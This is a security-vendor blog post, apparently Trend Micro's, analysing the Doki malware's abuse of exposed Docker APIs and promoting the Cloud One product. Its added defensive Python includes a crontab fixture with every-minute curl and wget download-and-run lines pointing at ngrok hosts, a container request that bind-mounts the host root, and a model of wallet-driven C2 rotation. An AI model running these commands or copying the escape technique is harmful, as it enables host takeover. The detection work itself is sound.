The rush to move resources and infrastructure to the cloud during Covid-19 has shifted the attack surface from on-premises environments to the cloud, and in many cases has created attack surfaces that IT security departments have never been tasked with protecting. Security teams are comfortable with on-premises DevOps teams developing and publishing apps and services internally, or even publishing production-ready services and containers to the cloud. When the build pipeline itself moves entirely to the cloud, however, security teams do not always understand the associated risks.
Recently a new Linux malware family named Doki was discovered being dropped through publicly accessible Docker APIs hosted at all major cloud providers. The way the threat actors gain access to container environments, an exposed Docker Engine API, is a previously documented technique, but the Doki payload itself had not been documented until now.
To drop Doki on a container host, the threat actors scan cloud provider networks for publicly accessible Docker APIs and use that same API to take control of the Docker environment. Once inside, they spin up their own containers and delete logs relating to their activity. One aspect of the technique is creating containers from Alpine images with curl installed. The image itself is not malicious, but with curl available the attacker can use the container to fetch and run whatever they like. Because it is a stock public image, typical registry scanning solutions see it as clean and let it through.
This is only the first step in the chain; the attacker cannot yet execute code on the container host, which is the result they are after. To get there they have to escape the container. In this case they use the bind parameter (the HostConfig.Binds field) of the container-create API request to bind-mount the host's root filesystem into the container under a /tmpxxxx path. Anything written into that path lands on the host, so the attacker can place files on the host and arrange for them to run there.
In addition, the attacker uses Ngrok to generate unique, short-lived URLs from which the curl-equipped containers download payloads. Through the bind mount the attacker also writes to the host's cron configuration, so that the download is repeated every minute. Most of the malware delivered this way was known cryptominers and other known malicious binaries; the most recent occurrences delivered the newly discovered Doki malware.
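As an added example (not from the original post and not Trend Micro's code), here are the two checks a practitioner would want after reading the chain above: one over a container-create request body, flagging bind mounts that expose sensitive host paths or grant host-level privileges, and one over a crontab, flagging the every-minute download-and-run entries used for persistence. The request bodies, the crontab text and the ngrok hostnames are constructed for illustration; the field names (HostConfig, Binds, Privileged, PidMode) are the Docker Engine API's, and the assumption that the attacker's bind places the host's root filesystem at /tmpxxxx is noted in the code.

```python
import os
import re
from typing import Any, Dict, List, Tuple

# Constructed bodies for POST /containers/create (field names follow the Docker
# Engine API). The first is the request the chain above relies on: a stock
# image, curl installed on start, and a bind that, as assumed here, places the
# host's root filesystem at /tmpxxxx inside the container.
ATTACKER_CREATE_REQUEST = {
    "Image": "alpine:latest",
    "Cmd": ["sh", "-c", "apk add --no-cache curl && sleep infinity"],
    "HostConfig": {"Binds": ["/:/tmpxxxx"]},
}
BENIGN_CREATE_REQUEST = {
    "Image": "alpine:latest",
    "Cmd": ["sh"],
    "HostConfig": {"Binds": ["/srv/app/data:/data:ro", "appcache:/cache"]},
}

# Host paths that let a container persist onto the host or talk to the daemon.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/spool/cron", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")


def _under(path: str, prefix: str) -> bool:
    """True if path is prefix or lies below it ("/" matches only itself)."""
    if prefix == "/":
        return path == "/"
    return path == prefix or path.startswith(prefix + "/")


def risky_mounts(create_request: Dict[str, Any]) -> List[str]:
    """Findings for a create body that hands the container a sensitive host path
    or host-level privileges. Binds entries are "host:container[:opts]"."""
    findings: List[str] = []
    host_config = create_request.get("HostConfig", {})
    for bind in host_config.get("Binds", []):
        parts = bind.split(":")
        if len(parts) < 2 or not parts[0].startswith("/"):
            continue  # malformed, or a named volume rather than a host path
        opts = parts[2].split(",") if len(parts) > 2 else []
        mode = "read-only" if "ro" in opts else "read-write"
        path = os.path.normpath(parts[0])  # collapses tricks like "/./" or "/a/.."
        for sensitive in SENSITIVE_HOST_PATHS:
            if _under(path, sensitive):
                findings.append(f"{bind}: mounts host path {sensitive} {mode}")
                break
    if host_config.get("Privileged"):
        findings.append("Privileged=true: full device and capability access")
    if host_config.get("PidMode") == "host":
        findings.append("PidMode=host: host process namespace exposed")
    return findings


# Constructed /etc/crontab excerpt (system format: schedule, user, command).
CRONTAB_SAMPLE = """\
# m h dom mon dow user command
17 *\t* * *\troot    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl -s http://1a2b3c4d.ngrok.io/x | sh
* * * * * root wget -q -O /tmp/.x http://5e6f.ngrok.io/p && chmod +x /tmp/.x && /tmp/.x
"""

DOWNLOAD_TOOL = re.compile(r"\b(curl|wget)\b")
TUNNEL_URL = re.compile(r"https?://[a-z0-9-]+\.ngrok\.io\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")


def suspicious_cron_lines(crontab_text: str) -> List[Tuple[str, List[str]]]:
    """Flag entries that combine an every-minute schedule with a download-and-run
    command: the persistence the attacker writes through the bind mount."""
    hits = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue
        schedule, command = fields[:5], fields[5]
        reasons = []
        if schedule == ["*"] * 5:
            reasons.append("runs every minute")
        if DOWNLOAD_TOOL.search(command):
            reasons.append("downloads with curl/wget")
        if TUNNEL_URL.search(command):
            reasons.append("fetches from an ngrok tunnel")
        if PIPE_TO_SHELL.search(command):
            reasons.append("pipes the download into a shell")
        if len(reasons) >= 2:  # one signal alone is common in legitimate jobs
            hits.append((line, reasons))
    return hits
```

The mount check is the one to wire into an admission point (a daemon authorization plugin, or a Kubernetes admission controller for the equivalent hostPath volumes), since it fires before the container exists; the cron check is a host-side hunt you would run from a workload agent or a periodic job.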
Doki has a few components that make it unusual. The most distinctive is that it locates its C2 domain in real time by combining a dynamic-DNS service with a domain generation algorithm (DGA) driven by the Dogecoin blockchain, behavior that has not been observed in malware before. The attacker controls which domain the malware contacts by transferring Dogecoin out of a wallet they own: the malware derives the domain from that wallet's public transaction history, so a new transfer moves every infected host to a new domain without the attacker touching any of them. This makes the attack very resilient to domain filtering and similar security products, because there is no fixed C2 domain to block.
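To make the mechanism concrete, here is an added illustration (not the page's code and not the malware's) of a wallet-driven DGA and what it means for defenders. The specific structure, SHA-256 of the wallet's cumulative sent amount with the first 12 hex characters used as a subdomain of a dynamic-DNS zone, is an assumption for illustration; the page does not give Doki's exact algorithm. The wallet address, the ledger entries and the ddns.net zone are constructed.

```python
import hashlib
from decimal import Decimal
from typing import Dict, List, Tuple

DYNDNS_ZONE = "ddns.net"  # assumed dynamic-DNS zone for illustration only

# Constructed attacker wallet and public ledger. Amounts are DOGE as a block
# explorer would return them, eight decimal places.
ATTACKER_WALLET = "DExampleAttackerWallet00000000000"
LEDGER: List[Dict[str, str]] = [
    {"txid": "tx-0001", "from": ATTACKER_WALLET, "to": "DSomeoneElse1", "amount": "0.17000000"},
    {"txid": "tx-0002", "from": "DSomeoneElse2", "to": ATTACKER_WALLET, "amount": "5.00000000"},
]


def fmt_amount(value: Decimal) -> str:
    return f"{value:.8f}"


def total_sent(ledger: List[Dict[str, str]], wallet: str) -> Decimal:
    """Everything the wallet has sent out. Public, so malware and defenders see the same number."""
    return sum((Decimal(tx["amount"]) for tx in ledger if tx["from"] == wallet), Decimal(0))


def c2_domain(sent_amount: str) -> str:
    """Assumed DGA: SHA-256 of the sent-amount string, first 12 hex chars as the subdomain."""
    digest = hashlib.sha256(sent_amount.encode("ascii")).hexdigest()
    return f"{digest[:12]}.{DYNDNS_ZONE}"


def current_c2(ledger: List[Dict[str, str]], wallet: str) -> str:
    return c2_domain(fmt_amount(total_sent(ledger, wallet)))


def attacker_rotates_c2(ledger: List[Dict[str, str]], wallet: str,
                        amount: str) -> Tuple[List[Dict[str, str]], str]:
    """The attacker's lever: one outgoing transfer changes the total, so every
    infected host resolves a new domain on its next lookup. No host is contacted."""
    tx = {"txid": f"tx-{len(ledger) + 1:04d}", "from": wallet, "to": "DSomeoneElse3", "amount": amount}
    new_ledger = ledger + [tx]
    return new_ledger, current_c2(new_ledger, wallet)


def domains_over_time(ledger: List[Dict[str, str]], wallet: str) -> List[Tuple[str, str]]:
    """Defender's view: replay the ledger and record every domain the malware would
    have used, so each can be registered in the zone first or sinkholed as it appears."""
    seen, running = [], Decimal(0)
    for tx in ledger:
        if tx["from"] == wallet:
            running += Decimal(tx["amount"])
            seen.append((tx["txid"], c2_domain(fmt_amount(running))))
    return seen
```

The defensive lesson is in `domains_over_time`: once the algorithm and the wallet are known, the blockchain is a public feed of future C2 domains, so a blocklist can be updated the moment a transfer appears rather than after the malware has already moved.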
Although this attack is novel, the approach to detecting it does not change: a layered security approach that covers every point where data moves or is generated is the best way to secure an environment. The Trend Micro Cloud One platform is built for cloud builders and can cover each of the points used in the Doki attack. For this attack the Docker API was the point of entry. Protecting the point of entry is where most companies choose to invest, and unfortunately many organizations are unable to extend their security beyond it because of budget constraints or unfamiliarity with the applicable products. Cloud One not only protects cloud environments but also gives enterprises visibility into the entire attack chain, so they can assess what was done and when, including at runtime and inside containers, which need security controls independent of an endpoint agent on a user device or cloud instance.
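Since the point of entry is an exposed daemon, here is an added example (not part of the original post and not a Trend Micro product) of the configuration check that finds it: it reads the `hosts` list and `tlsverify` setting from either daemon.json or the dockerd command line and reports TCP listeners that accept API calls without a client certificate. The weak and hardened configurations are constructed; the option names are Docker's own.

```python
import json
import shlex
from typing import List, Tuple

# Constructed configurations. The weak one is what an internet scan for Docker
# APIs finds: a plain-TCP listener on every interface and no client auth.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""
WEAK_CMDLINE = "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"

LOOPBACK = {"127.0.0.1", "localhost", "::1", "[::1]"}


def hosts_from_daemon_json(text: str) -> Tuple[List[str], bool]:
    cfg = json.loads(text)
    return list(cfg.get("hosts", [])), bool(cfg.get("tlsverify", False))


def hosts_from_cmdline(cmdline: str) -> Tuple[List[str], bool]:
    """Read -H/--host and --tlsverify from a dockerd command line. dockerd refuses
    to start when hosts are set both here and in daemon.json, so audit the one in use."""
    args = shlex.split(cmdline)
    hosts, tlsverify = [], False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 1
        elif arg.startswith(("-H=", "--host=")):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify


def audit_listeners(hosts: List[str], tlsverify: bool) -> List[str]:
    """One finding per TCP listener usable without a client certificate. Unix
    sockets are skipped: access to them is governed by file permissions."""
    findings = []
    for h in hosts:
        if not h.startswith("tcp://"):
            continue
        addr = h[len("tcp://"):]
        bind_host = addr.rsplit(":", 1)[0] if ":" in addr else addr
        on_network = bind_host not in LOOPBACK  # "" and 0.0.0.0 mean all interfaces
        if not tlsverify and on_network:
            findings.append(f"{h}: unauthenticated API reachable from the network (root on the host)")
        elif not tlsverify:
            findings.append(f"{h}: unauthenticated API on loopback (any local user can use it)")
    return findings
```

Passing the audit is the floor, not the ceiling: `tlsverify` only works with the CA and server certificate paths set alongside it, and even a TLS-protected listener should be reachable only from the hosts that need it (a security group or host firewall rule on the port), since the API is equivalent to root on the host once authenticated.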
For this attack in particular, Cloud One Application Security would be the first line of defense for protecting the Docker API from exploitation; this control can run security as code and help detect compromise at the Docker API level. The next layer is Cloud One Container Security, which would detect foreign containers being created in the CI/CD pipeline and prevent them from being published to production. Finally, Cloud One Workload Security can detect an exploit running on the container host: if an attacker evades the earlier controls, Workload Security would detect anything from malware on the host to unusual services being started on it.
The Trend Micro Cloud One platform offers cloud security services focused on threats to cloud infrastructure. It provides protection for cloud workloads, containers, cloud applications and file storage, checks adherence to cloud best-practice standards, and performs cloud-native network inspection. Each component covers a different cloud attack surface and is backed by Trend Micro's threat research and threat-intelligence partnerships. The platform also lets enterprises secure hybrid cloud environments, covering on-premises and cloud-based workloads from a single console.
Securing the cloud requires protection against old threats targeting a new attack surface, and against new threats designed specifically for cloud-native applications, like Doki. Whatever the threat or attack surface, we understand all sides of hybrid cloud environments and have built tools that meet the needs of IT security and DevOps teams alike.